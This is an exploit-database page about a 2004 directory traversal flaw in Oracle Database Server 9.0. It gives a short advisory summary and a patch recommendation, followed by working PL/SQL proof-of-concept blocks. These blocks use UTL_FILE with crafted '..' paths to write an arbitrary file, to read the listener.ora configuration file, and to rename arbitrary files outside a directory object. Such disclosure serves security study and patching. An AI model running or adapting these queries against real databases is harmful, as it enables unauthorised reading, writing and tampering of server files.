header-logo
Suggest Exploit
vendor:
Oracle Database Server
by:
SecurityFocus
8.5
CVSS
HIGH
Oracle Database Server Directory Traversal
22
CWE
Product Name: Oracle Database Server
Affected Version From: Oracle 9.0
Affected Version To: Oracle 9.0
Patch Exists: YES
Related CWE: N/A
CPE: oracle:database_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

Oracle Database Server Directory Traversal

Oracle Database server is reported to be vulnerable to multiple directory traversal vulnerabilities that may allow a remote attacker to read, write, or rename arbitrary files with the privileges of the Oracle Database server. This is due to a lack of sufficient input validation performed on filenames and paths passed to file processing functions, and may allow a malicious SQL query to traverse outside of a directory that is described in an Oracle directory object. Examples of malicious SQL queries are provided in the text.

Mitigation:

Oracle recommends that customers apply the latest Critical Patch Update as it contains fixes for these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12749/info

Oracle Database server is reported prone to multiple directory traversal vulnerabilities that may allow a remote attacker to read, write, or rename arbitrary files with the privileges of the Oracle Database server.

The issues are reported to exist due to a lack of sufficient input validation performed on filenames and paths passed to file processing functions, and may allow a malicious SQL query to traverse outside of a directory that is described in an Oracle directory object. 

--this create a file called Unbreakable.txt in the
same drive as the directory referenced by
--MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

--this example can be used to read arbitrary files in
the same drive as the directory referenced by
--MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--this rename any file in the same drive as the
directory referenced by
--MEDIA_DIR directory object
begin

UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;